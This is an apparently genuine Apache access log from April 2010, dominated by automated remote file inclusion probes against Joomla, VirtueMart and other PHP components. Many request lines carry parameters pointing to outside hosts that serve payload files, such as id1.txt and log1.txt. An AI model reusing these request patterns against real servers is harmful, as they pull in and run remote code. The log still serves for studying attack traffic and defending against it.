216.121.63.153 - - [07/Apr/2010:08:11:03 -0400] "GET /logs/access_log.Q110011800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:03 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:03 -0400] "GET /logs/error_log.Q110010100%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:08:11:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.121.63.153 - - [07/Apr/2010:08:11:05 -0400] "GET /logs/error_log.Q110010100%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:06 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:06 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:06 -0400] "GET /logs/access_log.Q110011800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:08 -0400] "GET /logs/error_log.Q110010100%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:11:16 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:11:16 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:11:16 -0400] "GET /logs/access_log.Q109071600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
166.137.138.239 - - [07/Apr/2010:08:11:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LI219545B2EA99800970605Y+M37+ENG HTTP/1.1" 200 36270 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LI21954512DD938007FF605Y+M37+ENG" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
211.203.180.144 - - [07/Apr/2010:08:11:30 -0400] "GET /logs/access_log.Q109071600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:11:30 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:11:30 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:11:38 -0400] "GET /logs/access_log.Q110021600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:11:38 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:11:38 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:11:38 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:11:38 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:11:38 -0400] "GET /logs/access_log.Q110021600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.55.108.245 - - [07/Apr/2010:08:11:51 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.108.245 - - [07/Apr/2010:08:11:51 -0400] "GET /logs/error_log.Q109072700 HTTP/1.1" 304 - "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
95.108.128.242 - - [07/Apr/2010:08:12:33 -0400] "GET /images/_notes/store_anim_r2_c1_f6.gif.mno HTTP/1.1" 200 250 "-" "Yandex/1.01.001 (compatible; Win16; I)"
211.203.180.144 - - [07/Apr/2010:08:12:35 -0400] "GET /logs/access_log.Q110022100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
172.16.1.82 - - [07/Apr/2010:08:12:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [07/Apr/2010:08:12:45 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [07/Apr/2010:08:12:45 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [07/Apr/2010:08:12:45 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [07/Apr/2010:08:12:45 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [07/Apr/2010:08:12:45 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.203.180.144 - - [07/Apr/2010:08:12:53 -0400] "GET /logs/access_log.Q110022100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:08:13:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L02033C553C1439008690094+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.203.180.144 - - [07/Apr/2010:08:14:08 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:14:09 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:14:09 -0400] "GET /logs/access_log.Q109071600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:14:13 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:14:13 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:14:13 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:14:14 -0400] "GET /logs/access_log.Q109071600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:14:14 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:14:18 -0400] "GET /logs/access_log.Q110022100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:14:18 -0400] "GET /logs/access_log.Q109071600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
207.58.170.67 - - [07/Apr/2010:08:14:38 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thecalling.co.kr/2010/.coke/id1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
207.58.170.67 - - [07/Apr/2010:08:14:38 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thecalling.co.kr/2010/.coke/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
207.58.170.67 - - [07/Apr/2010:08:14:38 -0400] "GET /logs/access_log.Q109081500//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thecalling.co.kr/2010/.coke/id1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:08:13:23 -0400] "GET /logs/access_log.Q110040100 HTTP/1.1" 200 6913632 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.16.1.180 - - [07/Apr/2010:08:14:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:08:14:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:08:14:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.216.43.133 - - [07/Apr/2010:08:15:10 -0400] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:08:15:10 -0400] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:08:15:10 -0400] "GET /logs/access_log.Q109122800%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:08:15:20 -0400] "GET /logs/error_log.Q109122800%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:08:15:37 -0400] "GET //include/lib.inc.php?site_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:08:15:37 -0400] "GET /logs//include/lib.inc.php?site_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:08:15:39 -0400] "GET /logs/access_log.Q109122800%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:08:15:40 -0400] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:08:15:40 -0400] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:08:15:46 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:08:14:53 -0400] "GET /logs/error_log.Q110040100 HTTP/1.1" 200 4304463 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.217.216.132 - - [07/Apr/2010:08:15:47 -0400] "GET /logs/error_log.Q109122800%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.180 - - [07/Apr/2010:08:16:13 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:08:16:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:08:16:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.216.43.133 - - [07/Apr/2010:08:16:28 -0400] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:08:16:28 -0400] "GET /logs/error_log.Q109122800///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:08:16:28 -0400] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:08:16:31 -0400] "GET /logs/access_log.Q109101400///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:08:16:33 -0400] "GET /images/_notes/headline_buy5.jpg.mno HTTP/1.1" 200 190 "-" "Yandex/1.01.001 (compatible; Win16; I)"
216.121.63.153 - - [07/Apr/2010:08:16:51 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:16:51 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:16:53 -0400] "GET /logs/access_log.Q109080600%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:17:09 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:17:09 -0400] "GET /logs/access_log.Q109080600%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:17:10 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
172.16.1.64 - - [07/Apr/2010:08:17:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.64 - - [07/Apr/2010:08:17:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.64 - - [07/Apr/2010:08:17:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.121.63.153 - - [07/Apr/2010:08:17:32 -0400] "GET /logs/access_log.Q109080600%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:17:32 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:17:32 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.221.88.162 - - [07/Apr/2010:08:17:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [07/Apr/2010:08:17:50 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [07/Apr/2010:08:17:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [07/Apr/2010:08:17:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
188.165.195.229 - - [07/Apr/2010:08:17:50 -0400] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:08:17:50 -0400] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:08:17:50 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:08:17:50 -0400] "GET /logs/access_log.Q110020500//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
115.89.243.90 - - [07/Apr/2010:08:17:54 -0400] "GET //download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
115.89.243.90 - - [07/Apr/2010:08:17:54 -0400] "GET /logs/access_log.Q110013100%20%20//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.89.243.90 - - [07/Apr/2010:08:17:55 -0400] "GET /logs//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:08:18:07 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:08:18:07 -0400] "GET /logs/error_log.Q109092400////?_SERVER[DOCUMENT_ROOT]=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:08:18:07 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 200 45243 "-" "Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:08:18:13 -0400] "GET /logs/access_log.Q109090100////?_SERVER[DOCUMENT_ROOT]=http://lemoland.ru/forum/attachments/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.195.114.252 - - [07/Apr/2010:08:18:06 -0400] "GET /logs/error_log.Q109062600 HTTP/1.0" 200 2330882 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.165.195.229 - - [07/Apr/2010:08:18:43 -0400] "GET /logs/access_log.Q110020500//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:08:18:43 -0400] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:08:18:43 -0400] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:08:18:47 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:18:57 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:18:57 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:19:02 -0400] "GET /logs/error_log.Q110032300%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:08:19:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.121.63.153 - - [07/Apr/2010:08:19:08 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:19:08 -0400] "GET /logs/error_log.Q110032300%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:19:09 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:19:13 -0400] "GET /logs/error_log.Q110032300%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:19:13 -0400] "GET /logs/error_log.Q110032300%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:08:19:17 -0400] "GET /logs//myevent.php?myevent_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:08:19:17 -0400] "GET /logs/access_log.Q110032500//myevent.php?myevent_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:08:19:17 -0400] "GET //myevent.php?myevent_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:19:56 -0400] "GET /logs/access_log.Q109070300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:08:19:58 -0400] "GET //download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:08:19:58 -0400] "GET /logs//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:08:19:58 -0400] "GET /logs/access_log.Q109102300//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:19:59 -0400] "GET /logs/access_log.Q109070300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:20:00 -0400] "GET /logs/access_log.Q109070300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:20:19 -0400] "GET /logs/error_log.Q110032300%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
